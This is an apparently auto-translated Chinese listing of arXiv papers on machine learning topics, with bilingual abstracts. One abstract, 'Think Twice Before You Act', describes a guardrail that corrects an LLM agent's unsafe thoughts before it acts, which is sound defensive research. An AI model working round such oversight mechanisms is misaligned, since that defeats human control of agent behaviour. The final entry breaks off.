智能交通系统(ITS)日益复杂,导致对计算卸载到边缘服务器、车辆节点和无人机等外部基础设施的兴趣显著增加。这些动态异构环境给传统卸载策略带来了挑战,促使人们探索强化学习(RL)和深度强化学习(DRL)作为自适应决策框架。本综述全面回顾了基于DRL的车辆边缘计算(VEC)卸载的最新进展。我们根据学习范式(如单智能体、多智能体)、系统架构(如集中式、分布式、分层式)和优化目标(如延迟、能量、公平性)对现有工作进行分类和比较。此外,我们分析了马尔可夫决策过程(MDP)公式的应用方式,并强调了奖励设计、协调机制和可扩展性方面的新兴趋势。最后,我们确定了开放挑战,并概述了未来研究方向,以指导下一代ITS鲁棒且智能的卸载策略的开发。

英文摘要

The increasing complexity of Intelligent Transportation Systems (ITS) has led to significant interest in computational offloading to external infrastructures such as edge servers, vehicular nodes, and UAVs. These dynamic and heterogeneous environments pose challenges for traditional offloading strategies, prompting the exploration of Reinforcement Learning (RL) and Deep Reinforcement Learning (DRL) as adaptive decision-making frameworks. This survey presents a comprehensive review of recent advances in DRL-based offloading for vehicular edge computing (VEC). We classify and compare existing works based on learning paradigms (e.g., single-agent, multi-agent), system architectures (e.g., centralized, distributed, hierarchical), and optimization objectives (e.g., latency, energy, fairness). Furthermore, we analyze how Markov Decision Process (MDP) formulations are applied and highlight emerging trends in reward design, coordination mechanisms, and scalability. Finally, we identify open challenges and outline future research directions to guide the development of robust and intelligent offloading strategies for next-generation ITS.

2506.03627 2026-05-27 cs.CL cs.AI 版本更新

Robustness of Prompting: Enhancing Robustness of Large Language Models Against Prompting Attacks

提示的鲁棒性:增强大型语言模型对抗提示攻击的鲁棒性

Lin Mu, Guowei Chu, Li Ni, Lei Sang, Yiwen Zhang

发表机构 * School of Computer Science and Technology, Anhui University(安徽大学计算机科学与技术学院)

AI总结 提出RoP(提示鲁棒性)策略,通过错误校正和引导两个阶段,增强LLM对输入扰动的鲁棒性,在算术、常识和逻辑推理任务上显著提升性能。

Comments Accepted by IEEE Transactions on Artificial Intelligence

详情
AI中文摘要

大型语言模型(LLM)通过有效利用提示策略在各种任务中展现了卓越的性能。然而,它们对输入扰动高度敏感,例如拼写错误或轻微字符顺序错误,这些扰动会显著损害其性能。尽管在提示技术方面取得了进展,如思维链和自动提示生成,但开发一种明确减轻此类扰动负面影响的提示策略仍然是一个开放的挑战。为弥补这一差距,我们提出了提示鲁棒性(RoP),一种旨在增强LLM鲁棒性的新型提示策略。RoP包括两个阶段:错误校正和引导。在错误校正阶段,RoP应用多种扰动方法生成对抗样本,用于生成自动纠正输入错误的提示。在引导阶段,RoP基于校正后的输入生成最优引导提示,引导模型生成更鲁棒和准确的推理。通过在算术、常识和逻辑推理任务上的全面实验,我们证明RoP显著提高了LLM对抗对抗扰动的鲁棒性。至关重要的是,与干净输入场景相比,它仅以最小的精度下降保持了模型准确性,从而将RoP确立为在实际应用中增强LLM鲁棒性的实用且有效的方法。

英文摘要

Large Language Models (LLMs) have demonstrated remarkable performance across various tasks by effectively utilizing a prompting strategy. However, they are highly sensitive to input perturbations, such as typographical errors or slight character order errors, which can significantly impair their performance. Despite advances in prompting techniques such as Chain-of-Thought and automatic prompt generation, developing a prompting strategy that explicitly mitigates the negative impact of such perturbations remains an open challenge. To bridge this gap, we propose Robustness of Prompting (RoP), a novel prompting strategy aimed at enhancing the robustness of LLMs. RoP consists of two stages: Error Correction and Guidance. In the Error Correction stage, RoP applies diverse perturbation methods to generate adversarial examples, which are used to generate prompts that correct input errors automatically. In the Guidance stage, RoP generates an optimal guidance prompt based on the corrected input, guiding the model to generate more robust and accurate inferences. Through comprehensive experiments spanning arithmetic, commonsense, and logical reasoning tasks, we demonstrate that RoP significantly improves LLMs' robustness against adversarial perturbations. Crucially, it preserves model accuracy with only minimal degradation compared to clean input scenarios, thereby establishing RoP as a practical and effective approach for enhancing LLM robustness in real-world applications.

2411.02355 2026-05-27 cs.LG cs.AI 版本更新

"Give Me BF16 or Give Me Death"? Accuracy-Performance Trade-Offs in LLM Quantization

“给我BF16,否则给我死亡”?LLM量化中的精度-性能权衡

Eldar Kurtic, Alexandre Marques, Shubhra Pandit, Mark Kurtz, Dan Alistarh

发表机构 * Red Hat AI(红帽AI) Institute of Science and Technology Austria(奥地利科学与技术研究院)

AI总结 本文通过超过50万次评估,全面研究了FP8、INT8和INT4量化在Llama-3.1模型族上的精度-性能权衡,发现FP8几乎无损、INT8精度损失低、INT4仅权重量化具有竞争力,并基于vLLM框架给出了不同部署场景下的最优量化格式建议。

Comments Accepted to ACL 2025

详情
AI中文摘要

量化是加速大型语言模型(LLM)推理的强大工具,但不同格式下的精度-性能权衡仍不明确。在本文中,我们进行了迄今为止最全面的实证研究,在整个Llama-3.1模型族上通过学术基准和实际任务评估了FP8、INT8和INT4量化。通过超过50万次评估,我们的研究得出了几个关键发现:(1)FP8(W8A8-FP)在所有模型规模上几乎无损;(2)良好调优的INT8(W8A8-INT)实现了令人惊讶的低精度下降(1-3%);(3)INT4仅权重量化(W4A16-INT)比预期更具竞争力,可与8位量化相媲美。此外,我们通过流行的vLLM框架分析推理性能,研究了不同部署场景下的最优量化格式。我们的分析提供了明确的部署建议:W4A16是同步设置中最具成本效益的,而W8A8在异步连续批处理中占主导地位。对于混合工作负载,最优选择取决于具体用例。我们的发现为大规模部署量化LLM提供了实用的、数据驱动的指导——确保速度、效率和精度之间的最佳平衡。

英文摘要

Quantization is a powerful tool for accelerating large language model (LLM) inference, but the accuracy-performance trade-offs across different formats remain unclear. In this paper, we conduct the most comprehensive empirical study to date, evaluating FP8, INT8, and INT4 quantization across academic benchmarks and real-world tasks on the entire Llama-3.1 model family. Through over 500,000 evaluations, our investigation yields several key findings: (1) FP8 (W8A8-FP) is effectively lossless across all model scales, (2) well-tuned INT8 (W8A8-INT) achieves surprisingly low (1-3%) accuracy degradation, and (3) INT4 weight-only (W4A16-INT) is more competitive than expected, rivaling 8-bit quantization. Further, we investigate the optimal quantization format for different deployments by analyzing inference performance through the popular vLLM framework. Our analysis provides clear deployment recommendations: W4A16 is the most cost-efficient for synchronous setups, while W8A8 dominates in asynchronous continuous batching. For mixed workloads, the optimal choice depends on the specific use case. Our findings offer practical, data-driven guidelines for deploying quantized LLMs at scale -- ensuring the best balance between speed, efficiency, and accuracy.
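For readers unfamiliar with what INT8 versus INT4 weight quantization means numerically, the sketch below shows plain symmetric round-to-nearest quantization with a single per-tensor scale. This is a textbook baseline chosen for illustration, not the calibration procedure used in the paper, and the helper names are hypothetical.

```python
def quantize_symmetric(values, bits):
    """Map floats to signed integers in [-qmax, qmax] with one shared scale."""
    qmax = 2 ** (bits - 1) - 1          # 127 for INT8, 7 for INT4
    max_abs = max(abs(v) for v in values)
    scale = max_abs / qmax if max_abs > 0 else 1.0
    # Round to the nearest integer level and clamp to the representable range.
    q = [max(-qmax, min(qmax, round(v / scale))) for v in values]
    return q, scale


def dequantize(q, scale):
    """Recover approximate floats from integer levels."""
    return [x * scale for x in q]


def max_abs_error(values, bits):
    """Largest round-trip error for the given bit width."""
    q, scale = quantize_symmetric(values, bits)
    return max(abs(v - d) for v, d in zip(values, dequantize(q, scale)))


weights = [0.5, -1.0, 0.25, 0.0, 0.9]   # toy weight tensor
for bits in (8, 4):
    print(bits, max_abs_error(weights, bits))
```

The round-trip error is bounded by half the scale, and the scale grows as the bit width shrinks, which is why INT4 generally needs more careful handling than INT8 to stay competitive.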

2505.18728 2026-05-27 cs.LG cs.AI 版本更新

Message-Passing State-Space Models: Improving Graph Learning with Modern Sequence Modeling

消息传递状态空间模型:利用现代序列建模改进图学习

Andrea Ceni, Alessio Gravina, Claudio Gallicchio, Davide Bacciu, Carola-Bibiane Schonlieb, Moshe Eliasof

发表机构 * University of Pisa(比萨大学) University of Cambridge(剑桥大学)

AI总结 提出MP-SSM,将现代状态空间模型的核心计算嵌入消息传递神经网络,实现静态和时序图上的高效、置换等变和长程信息传播,并通过精确敏感性分析刻画深层信息流问题。

详情
AI中文摘要

状态空间模型(SSM)在序列建模中的近期成功推动了其向图学习的迁移,催生了图状态空间模型(GSSM)。然而,现有的GSSM通过将SSM模块应用于从图中提取的序列,往往损害了置换等变性、消息传递兼容性和计算效率等核心属性。本文引入了一种新视角,将现代SSM计算的关键原理直接嵌入消息传递神经网络框架,从而为静态图和时序图提供统一的方法论。我们的方法MP-SSM能够实现高效、置换等变和长程信息传播,同时保持消息传递的架构简洁性。关键的是,MP-SSM支持精确的敏感性分析,我们利用该分析从理论上刻画信息流,并评估深层网络中的梯度消失和过压缩等问题。此外,我们的设计选择允许类似现代SSM的高度优化并行实现。我们在包括节点分类、图属性预测、长程基准和时空预测在内的广泛任务上验证了MP-SSM,展示了其多功能性和强大的实证性能。

英文摘要

The recent success of State-Space Models (SSMs) in sequence modeling has motivated their adaptation to graph learning, giving rise to Graph State-Space Models (GSSMs). However, existing GSSMs operate by applying SSM modules to sequences extracted from graphs, often compromising core properties such as permutation equivariance, message-passing compatibility, and computational efficiency. In this paper, we introduce a new perspective by embedding the key principles of modern SSM computation directly into the Message-Passing Neural Network framework, resulting in a unified methodology for both static and temporal graphs. Our approach, MP-SSM, enables efficient, permutation-equivariant, and long-range information propagation while preserving the architectural simplicity of message passing. Crucially, MP-SSM enables an exact sensitivity analysis, which we use to theoretically characterize information flow and evaluate issues like vanishing gradients and over-squashing in the deep regime. Furthermore, our design choices allow for a highly optimized parallel implementation akin to modern SSMs. We validate MP-SSM across a wide range of tasks, including node classification, graph property prediction, long-range benchmarks, and spatiotemporal forecasting, demonstrating both its versatility and strong empirical performance.

2505.18603 2026-05-27 cs.AI cs.CV 版本更新

Doc-CoB: Enhancing Document Understanding with Visual Chain-of-Boxes Reasoning

Doc-CoB:通过视觉链式框推理增强文档理解

Ye Mo, Kai Ye, Xianwei Mao, Zirui Shao, Gang Huang, Bo Zhang, Hangdi Xing, Kehan Chen, Huan Zhou, Zixu Yan, Jiajun Bu, Sheng Zhou

发表机构 * Zhejiang Key Laboratory of Accessible Perception and Intelligent Systems, Zhejiang University(浙江省无障碍感知与智能系统重点实验室,浙江大学) Alibaba Group(阿里巴巴集团) Shanghai AI Laboratory(上海人工智能实验室)

AI总结 提出Doc-CoB框架,通过粗到细的布局感知视觉推理,结合多模态大语言模型,逐步聚焦查询相关布局区域,提升文档理解性能。

详情
AI中文摘要

文档理解旨在对文档图像进行问答和信息提取,其中视觉内容信息密集,大多数查询仅依赖于少数相关布局区域。然而,现有方法要么采用一次通过策略,隐式假设所有布局同等重要,要么过度关注小区域而丢失关键布局信息。为解决这些局限性,我们引入了Doc-CoB(链式框),一个简单而有效的框架,将粗到细的布局感知视觉推理集成到多模态大语言模型中。Doc-CoB不是直接放大到小区域,而是逐步聚焦于查询相关布局,同时保留全局文档信息。具体来说,它首先选择关键布局框,然后通过视觉提示聚焦于这些框进行进一步理解。为支持这一范式,我们引入了两个推理任务:框识别和框推理,并构建了一个自动流水线,生成24.9万个带有中间视觉监督的训练样本。在七个基准测试和四种流行模型上的广泛实验表明,Doc-CoB显著提升了性能,证明了其有效性和广泛适用性。

英文摘要

Document understanding aims to perform question answering and information extraction over document images, where the visual content is highly information-dense and most queries rely on only a few relevant layout regions. However, existing methods either adopt a one-pass strategy that implicitly assumes all layouts are equally important, or focus excessively on small regions at the cost of losing critical layout information. To address these limitations, we introduce Doc-CoB (Chain-of-Boxes), a simple-yet-effective framework that integrates coarse-to-fine layout-aware visual reasoning into multimodal large language models. Instead of directly zooming into small regions, Doc-CoB progressively focuses on query-relevant layouts while preserving global document information. Specifically, it first selects key layout boxes and then focuses on them for further understanding with visual prompting. To support this paradigm, we introduce two reasoning tasks for box recognition and box reasoning, with an automatic pipeline that constructs 249k training samples with intermediate visual supervision. Extensive experiments on seven benchmarks with four popular models show that Doc-CoB significantly improves performance, demonstrating its effectiveness and wide applicability.

2505.17163 2026-05-27 cs.LG cs.AI cs.CL cs.CV 版本更新

OCR-Reasoning Benchmark: Unveiling the True Capabilities of MLLMs in Complex Text-Rich Image Reasoning

OCR-Reasoning基准:揭示MLLMs在复杂文本丰富图像推理中的真实能力

Mingxin Huang, Yongxin Shi, Dezhi Peng, Songxuan Lai, Zecheng Xie, Lianwen Jin

发表机构 * South China University of Technology(华南理工大学) Huawei Technologies Co., Ltd(华为技术有限公司)

AI总结 提出OCR-Reasoning基准,包含1069个人工标注样本,覆盖6种核心推理能力和18个实际推理任务,通过双标注(最终答案和逐步推理过程)评估多模态大语言模型在文本丰富图像推理中的能力,发现最先进模型准确率均低于50%。

Comments ICLR 2026

详情
AI中文摘要

近期多模态慢思考系统在各种视觉推理任务中表现出色。然而,由于缺乏专门且系统的基准,它们在文本丰富图像推理任务中的能力仍未得到充分研究。为填补这一空白,我们提出了OCR-Reasoning,一个新颖的基准,旨在系统评估多模态大语言模型在文本丰富图像推理任务上的表现。具体而言,OCR-Reasoning包含1069个人工标注的示例,涵盖文本丰富视觉场景中的6种核心推理能力和18个实际推理任务。与仅提供最终答案的现有文本丰富图像理解基准不同,本基准额外提供了详细的逐步推理过程。这种双标注使得能够同时评估模型的最终答案和推理过程,从而全面评估文本丰富推理能力。利用该基准,我们对最新的多模态大语言模型进行了全面评估。结果表明,即使是最先进的多模态大语言模型在文本丰富图像推理任务中也面临巨大困难,在我们的基准上没有一个模型的准确率超过50%,这表明文本丰富图像推理的挑战是一个亟待解决的问题。基准和评估脚本可在https://github.com/SCUT-DLVCLab/OCR-Reasoning获取。

英文摘要

Recent advancements in multimodal slow-thinking systems have demonstrated remarkable performance across various visual reasoning tasks. However, their capabilities in text-rich image reasoning tasks remain understudied due to the absence of a dedicated and systematic benchmark. To address this gap, we propose OCR-Reasoning, a novel benchmark designed to systematically assess Multimodal Large Language Models on text-rich image reasoning tasks. Specifically, OCR-Reasoning comprises 1,069 human-annotated examples spanning 6 core reasoning abilities and 18 practical reasoning tasks in text-rich visual scenarios. Unlike existing text-rich image understanding benchmarks that only provide a final answer, this benchmark additionally provides a detailed step-by-step reasoning process. This dual annotation enables the evaluation of both the models' final answers and their reasoning processes, thereby offering a holistic assessment of text-rich reasoning capabilities. By leveraging this benchmark, we conducted a comprehensive evaluation of the latest MLLMs. Our results demonstrate that even the most advanced MLLMs exhibit substantial difficulties in text-rich image reasoning tasks, with none achieving an accuracy above 50% on our benchmark, indicating that the challenges of text-rich image reasoning are an urgent issue to be addressed. The benchmark and evaluation scripts are available at https://github.com/SCUT-DLVCLab/OCR-Reasoning.

2505.11063 2026-05-27 cs.AI cs.CR 版本更新

Think Twice Before You Act: Enhancing Agent Behavioral Safety with Thought Correction

三思而后行:通过思想修正增强智能体行为安全

Changyue Jiang, Wenqi Zhang, Xudong Pan, Geng Hong, Min Yang

发表机构 * Fudan University, Shanghai, China(复旦大学,上海,中国) Shanghai Innovation Institute, Shanghai, China(上海创新研究院,上海,中国) Shanghai Pudong Research Institute of Cryptology, Shanghai, China(上海浦东密码研究院,上海,中国)

AI总结 提出Thought-Aligner,一种轻量级插件式安全模型,在动作执行前对不安全思想进行因果修正,无需修改底层智能体,通过两阶段对比学习训练,在多个基准和六种LLM上将行为安全从约50%提升至约90%,超越现有防护约23%,同时提升有用性约5%。

Comments Accepted to ICML 2026

详情
AI中文摘要

基于LLM的智能体通过迭代推理、工具使用和环境交互来解决复杂任务,其中每个中间思想直接塑造后续动作。因此,这些思想中的微小偏差可能传播为不安全行为,但现有的防护措施通常仅作用于最终输出或需要侵入式模型修改。我们引入了Thought-Aligner,一种轻量级插件式安全模型,它在动作执行前对不安全思想进行因果修正,而不改变底层智能体。修正后的思想被反馈给智能体,将其决策过程和工具使用引导至更安全的轨迹。由于仅在思想层面操作,Thought-Aligner是模型无关的,可以集成到各种智能体框架中。我们通过在十个风险场景中生成的成对安全和不安全思想上进行两阶段对比学习来训练Thought-Aligner。在多种智能体安全基准和六种LLM上的实验表明,Thought-Aligner将行为安全从无保护时的约50%提升至平均约90%,超过最先进的防护约23%,同时还将有用性提高了约5%。该方法具有低每步延迟和最小开销,实现了可扩展且实用的部署。我们在https://huggingface.co/WhitzardAgent/Thought-Aligner-7B公开发布了Thought-Aligner-7B。

英文摘要

LLM-based agents solve complex tasks through iterative reasoning, tool use, and environment interaction, where each intermediate thought directly shapes subsequent actions. Small deviations in these thoughts can therefore propagate into unsafe behaviors, yet existing guardrails typically operate only on final outputs or require intrusive model modifications. We introduce Thought-Aligner, a lightweight plug-in safety model that performs causal correction on unsafe thoughts before action execution, without altering the underlying agent. The corrected thoughts are fed back into the agent, steering its decision process and tool use toward safer trajectories. Because it operates solely at the thought level, Thought-Aligner is model-agnostic and can be integrated into diverse agent frameworks. We train Thought-Aligner via two-stage contrastive learning on paired safe and unsafe thoughts generated across ten risk scenarios. Experiments on diverse agent-safety benchmarks and six LLMs show that Thought-Aligner increases behavioral safety from about 50% without protection to around 90% on average, exceeding state-of-the-art guardrails by roughly 23%, while also improving helpfulness by about 5%. The method incurs low per-step latency and minimal overhead, enabling scalable and practical deployment. We publicly release Thought-Aligner-7B at https://huggingface.co/WhitzardAgent/Thought-Aligner-7B.

2502.17666 2026-05-27 cs.LG cs.AI 版本更新

Yes, Q-learning Helps Offline In-Context RL

是的,Q学习有助于离线上下文强化学习

Denis Tarasov, Alexander Nikulin, Ilya Zisman, Albina Klepach, Andrei Polubarov, Nikita Lyubaykin, Alexander Derevyagin, Igor Kiselev, Vladislav Kurenkov

发表机构 * Reinforcement Learning Journal(强化学习期刊)

AI总结 本文在离线上下文强化学习框架中整合RL目标,通过150多个数据集实验证明,直接优化RL目标相比算法蒸馏平均提升约30%性能,且价值学习中的保守性带来额外改进。

详情
AI中文摘要

现有的离线上下文强化学习(ICRL)方法主要依赖监督训练目标,这在离线RL设置中已知存在局限性。在本研究中,我们探索了在离线ICRL框架中整合RL目标。通过在150多个GridWorld和MuJoCo环境派生数据集上的实验,我们证明,与广泛采用的算法蒸馏(AD)相比,直接优化RL目标在各种数据集覆盖范围、结构、专业水平和环境复杂性下平均提升约30%的性能。此外,在具有挑战性的XLand-MiniGrid环境中,RL目标使AD的性能翻倍。我们的结果还揭示,在几乎所有测试的设置中,价值学习期间加入保守性带来了额外的改进。我们的发现强调了将ICRL学习目标与RL奖励最大化目标对齐的重要性,并表明离线RL是推进ICRL的一个有前景的方向。

英文摘要

Existing offline in-context reinforcement learning (ICRL) methods have predominantly relied on supervised training objectives, which are known to have limitations in offline RL settings. In this study, we explore the integration of RL objectives within an offline ICRL framework. Through experiments on more than 150 GridWorld and MuJoCo environment-derived datasets, we demonstrate that optimizing RL objectives directly improves performance by approximately 30% on average compared to widely adopted Algorithm Distillation (AD), across various dataset coverages, structures, expertise levels, and environmental complexities. Furthermore, in the challenging XLand-MiniGrid environment, RL objectives doubled the performance of AD. Our results also reveal that the addition of conservatism during value learning brings additional improvements in almost all settings tested. Our findings emphasize the importance of aligning ICRL learning objectives with the RL reward-maximization goal, and demonstrate that offline RL is a promising direction for advancing ICRL.

2407.15073 2026-05-27 cs.AI cs.CL 版本更新

Multi-Agent Causal Discovery Using Large Language Models

基于大型语言模型的多智能体因果发现

Hao Duong Le, Xin Xia, Haijie Xu, Chen Zhang

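Affiliations * Department of Industrial Engineering, Tsinghua University

AI summary Proposes MAC, a multi-agent causal discovery framework in which a Meta Fusion mechanism combines a Debate-Coding Module, which autonomously selects an SCD algorithm, with a metadata-based adversarial Meta-Debate Module. MAC achieves the best aggregate performance across several benchmarks.

Details
AI Chinese abstract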

因果发现旨在识别变量之间的因果关系,是各科学领域的基本问题。传统的统计因果发现(SCD)方法仅依赖观测数据,忽略元数据中可用的上下文信息,而近期基于LLM的方法利用元数据但将大型语言模型(LLM)视为单一智能体,使其判断易受记忆或偏见关联影响。为解决这一差距,我们引入MAC(多智能体因果发现框架),将因果发现转化为多智能体辩论与自主选择SCD算法相结合。MAC通过元融合机制桥接两个互补模块:辩论编码模块(DCM)通过自主选择并执行最合适的SCD算法将初始图基于数据,以及元辩论模块(MDM)通过对抗性的肯定-否定-裁判辩论基于元数据精炼图。在五个基准数据集和三个指标(F1、SHD、NHD)上,MAC在五个统计基线和四个基于LLM的基线中取得了最佳综合性能,在使用Gemini-2.0-Flash时在15个评估点中排名第一10次——包括完美重建地震图——并在三个骨干LLM上保持稳健。

English abstract

Causal discovery aims to identify causal relationships between variables and is a fundamental problem across the sciences. Traditional statistical causal discovery (SCD) methods rely solely on observational data and ignore the contextual information available in metadata, whereas recent LLM-based methods exploit metadata but treat the large language model (LLM) as a single agent, leaving its judgments vulnerable to memorized or biased associations. To address this gap, we introduce MAC (Multi-Agent Causal Discovery Framework), which casts causal discovery as a multi-agent debate coupled with the autonomous selection of an SCD algorithm. MAC combines two complementary modules, bridged by a Meta Fusion mechanism: a Debate-Coding Module (DCM) that grounds an initial graph in data by autonomously selecting and executing the best-suited SCD algorithm, and a Meta-Debate Module (MDM) that refines the graph through an adversarial Affirmative-Negative-Judge debate over the metadata. Across five benchmark datasets and three metrics (F1, SHD, NHD), MAC achieves the best aggregate performance among five statistical and four LLM-based baselines, ranking first on 10 of 15 evaluation points with Gemini-2.0-Flash -- including a perfect reconstruction of the Earthquake graph -- and remains robust across three backbone LLMs.

2306.13985 2026-05-27 stat.ML cs.AI cs.LG stat.ME Updated version

Robust Classification of High-Dimensional Data using Data-Adaptive Energy Distance

使用数据自适应能量距离的高维数据鲁棒分类

Jyotishka Ray Choudhury, Aytijhya Saha, Sarbojit Roy, Subhajit Dutta

Affiliations * Indian Statistical Institute, Kolkata, India; School of Industrial and Systems Engineering, Georgia Institute of Technology, Atlanta, USA; Computer, Electrical and Mathematical Sciences and Engineering Division, King Abdullah University of Science and Technology, Saudi Arabia; Applied Statistics Unit, Indian Statistical Institute, Kolkata, India; Department of Mathematics and Statistics, Indian Institute of Technology Kanpur, India

AI summary For high-dimensional low-sample-size (HDLSS) data, proposes robust classifiers that need no tuning parameters and no moment conditions, achieve perfect classification in the HDLSS asymptotic regime under fairly general conditions, and show advantages in simulations and real-data analysis.

Comments Published at the European Conference on Machine Learning and Principles and Practice of Knowledge Discovery in Databases (ECML PKDD), 2023

Details
Journal ref
In: ECML PKDD 2023: Research Track. Lecture Notes in Computer Science, vol 14173. Springer, Cham (2023)
AI Chinese abstract

高维低样本量数据的分类在基因表达研究、癌症研究和医学成像等多种实际场景中构成挑战。本文开发并分析了一些专门为HDLSS数据设计的分类器。这些分类器无需调参且具有鲁棒性,即它们不依赖于底层数据分布的任何矩条件。研究表明,在相当一般的条件下,它们在HDLSS渐近框架下能实现完美分类。还研究了所提分类器的比较性能。我们的理论结果得到了广泛的模拟研究和真实数据分析的支持,这些分析表明所提出的分类技术相对于几种广泛认可的方法具有显著优势。

English abstract

Classification of high-dimensional low sample size (HDLSS) data poses a challenge in a variety of real-world situations, such as gene expression studies, cancer research, and medical imaging. This article presents the development and analysis of some classifiers that are specifically designed for HDLSS data. These classifiers are free of tuning parameters and are robust, in the sense that they are devoid of any moment conditions of the underlying data distributions. It is shown that they yield perfect classification in the HDLSS asymptotic regime, under some fairly general conditions. The comparative performance of the proposed classifiers is also investigated. Our theoretical results are supported by extensive simulation studies and real data analysis, which demonstrate promising advantages of the proposed classification techniques over several widely recognized methods.
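For readers unfamiliar with energy distance, the sketch below shows the classical (non-adaptive) sample energy distance between two classes and a simple tuning-free average-distance rule built from the same pairwise distances. It is not the data-adaptive variant developed in the paper. The function names, the V-statistic form of the within-class term, and the synthetic Gaussian data are assumptions for illustration.

```python
import numpy as np


def mean_pairwise_distance(a, b):
    """Mean Euclidean distance over all pairs (row of a, row of b)."""
    diffs = a[:, None, :] - b[None, :, :]
    return np.linalg.norm(diffs, axis=2).mean()


def energy_distance(x, y):
    """Classical sample energy distance (V-statistic form, diagonal included)."""
    return (2.0 * mean_pairwise_distance(x, y)
            - mean_pairwise_distance(x, x)
            - mean_pairwise_distance(y, y))


def classify(z, x, y):
    """Return 0 if z looks closer to sample x, else 1.

    Each class score is the mean distance from z to the class sample minus
    half the within-class mean distance; no tuning parameter is involved.
    """
    z = z[None, :]
    score_x = mean_pairwise_distance(z, x) - 0.5 * mean_pairwise_distance(x, x)
    score_y = mean_pairwise_distance(z, y) - 0.5 * mean_pairwise_distance(y, y)
    return 0 if score_x <= score_y else 1


if __name__ == "__main__":
    rng = np.random.default_rng(0)
    dim, n = 200, 10  # many more dimensions than samples (HDLSS-like setting)
    class0 = rng.normal(loc=0.0, size=(n, dim))
    class1 = rng.normal(loc=2.0, size=(n, dim))
    print(energy_distance(class0, class1))
    print(classify(np.zeros(dim), class0, class1))
    print(classify(np.full(dim, 2.0), class0, class1))
```

Because the rule only compares averages of pairwise distances, it has nothing to tune, which is the property the abstract emphasizes for the proposed classifiers.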

2003.05746 2026-05-27 cs.LO cs.AI cs.DB Updated version

Querying and Repairing Inconsistent Prioritized Knowledge Bases: Complexity Analysis and Links with Abstract Argumentation

查询与修复不一致的优先知识库:复杂性分析与抽象论证的联系

Meghyn Bienvenu, Camille Bourgaux

Affiliations * CNRS & University of Bordeaux, France; DI ENS, ENS, CNRS, PSL University & Inria, Paris, France

AI summary Studies inconsistency handling in prioritized knowledge bases: defines globally-, Pareto- and completion-optimal repairs, analyzes the data complexity of query entailment based on these repairs, of the existence of a unique optimal repair, and of repair enumeration, and relates optimal repairs to extensions of abstract argumentation frameworks.

Comments This is an extended version of a paper appearing at the 17th International Conference on Principles of Knowledge Representation and Reasoning (KR 2020). This version corrects the statement of Theorem 43 (missing hypothesis). 27 pages

Details
AI Chinese abstract

本文探讨了优先知识库(由本体、事实集和冲突事实间的优先关系组成)的不一致性处理问题。在数据库设置中,已研究了密切相关的场景,并定义了优先不一致数据库的三种不同最优修复概念(全局、帕累托和完成)。将这些全局、帕累托和完成最优修复概念迁移到我们的设置后,我们研究了核心推理任务的数据复杂度:基于最优修复的不一致性容忍语义下的查询蕴含、唯一最优修复的存在性以及所有最优修复的枚举。我们的结果为用常见DL-Lite方言表述的本体上这些任务的数据复杂度提供了近乎完整的图景。我们工作的第二个贡献是阐明了最优修复与(基于集合的)论证框架不同扩展概念之间的关系。在我们的结果中,我们展示了帕累托最优修复精确对应于稳定扩展(并且通常也对应于优先扩展),并提出了一种受基础扩展启发且具有良好计算特性的优先知识库新语义。我们的研究还产生了一些关于基于偏好的论证框架的独立兴趣结果。

English abstract

In this paper, we explore the issue of inconsistency handling over prioritized knowledge bases (KBs), which consist of an ontology, a set of facts, and a priority relation between conflicting facts. In the database setting, a closely related scenario has been studied and led to the definition of three different notions of optimal repairs (global, Pareto, and completion) of a prioritized inconsistent database. After transferring the notions of globally-, Pareto- and completion-optimal repairs to our setting, we study the data complexity of the core reasoning tasks: query entailment under inconsistency-tolerant semantics based upon optimal repairs, existence of a unique optimal repair, and enumeration of all optimal repairs. Our results provide a nearly complete picture of the data complexity of these tasks for ontologies formulated in common DL-Lite dialects. The second contribution of our work is to clarify the relationship between optimal repairs and different notions of extensions for (set-based) argumentation frameworks. Among our results, we show that Pareto-optimal repairs correspond precisely to stable extensions (and often also to preferred extensions), and we propose a novel semantics for prioritized KBs which is inspired by grounded extensions and enjoys favourable computational properties. Our study also yields some results of independent interest concerning preference-based argumentation frameworks.
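As a small illustration of Pareto-optimal repairs, the brute-force sketch below enumerates them for a toy fact set. It assumes the usual definition from the prioritized-database literature, which the abstract itself does not spell out: a consistent set B is a Pareto improvement of a consistent set A if some fact in B \ A is preferred to every fact in A \ B, and A is Pareto-optimal if no such B exists. Conflicts are assumed to be binary, the ontology is left out, and all function names are hypothetical.

```python
from itertools import combinations


def is_consistent(subset, conflicts):
    """A subset is consistent if it contains no conflicting pair of facts."""
    return not any(a in subset and b in subset for a, b in conflicts)


def consistent_subsets(facts, conflicts):
    """Enumerate every consistent subset (exponential; toy inputs only)."""
    ordered = sorted(facts)
    for size in range(len(ordered) + 1):
        for combo in combinations(ordered, size):
            candidate = frozenset(combo)
            if is_consistent(candidate, conflicts):
                yield candidate


def is_pareto_improvement(b, a, prefers):
    """True if some fact in b - a is preferred to every fact in a - b."""
    dropped = a - b
    return any(all((beta, alpha) in prefers for alpha in dropped)
               for beta in b - a)


def pareto_optimal_repairs(facts, conflicts, prefers):
    """Consistent subsets that admit no Pareto improvement."""
    candidates = list(consistent_subsets(facts, conflicts))
    return [a for a in candidates
            if not any(is_pareto_improvement(b, a, prefers) for b in candidates)]


if __name__ == "__main__":
    facts = {"p", "q", "r"}
    conflicts = {("p", "q")}   # p and q cannot both be kept
    prefers = {("p", "q")}     # p is preferred to q
    repairs = pareto_optimal_repairs(facts, conflicts, prefers)
    print([sorted(r) for r in repairs])  # [['p', 'r']]
```

With an empty priority relation the same function returns both maximal consistent subsets, {p, r} and {q, r}, which matches the intuition that priorities only prune ordinary repairs.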

2404.18539 2026-05-27 cs.CV cs.AI Updated version

Enhancing Boundary Segmentation for Topological Accuracy with Skeleton-based Methods

基于骨架的方法增强边界分割的拓扑准确性

Chuni Liu, Boyuan Ma, Xiaojuan Ban, Yujie Xie, Hao Wang, Weihua Xue, Jingchao Ma, Ke Xu

Affiliations * University of Science and Technology Beijing; Beijing Advanced Innovation Center for Materials Genome Engineering; School of Intelligence Science and Technology; Shunde Innovation School; Institute for Advanced Materials and Technology; Key Laboratory of Intelligent Bionic Unmanned Systems; Institute of Materials Intelligent Technology; Liaoning Academy of Materials; School of Materials Science and Technology

AI summary Proposes the Skea-Topo Aware loss, which improves the topological consistency of boundary segmentation for reticular images through skeleton-aware weighting and a boundary rectified term, improving VI by up to 7 points over 13 methods on three datasets.

Details
Journal ref
Proceedings of the Thirty-Third International Joint Conference on Artificial Intelligence (IJCAI-24), pp. 1092-1100, 2024
AI Chinese abstract

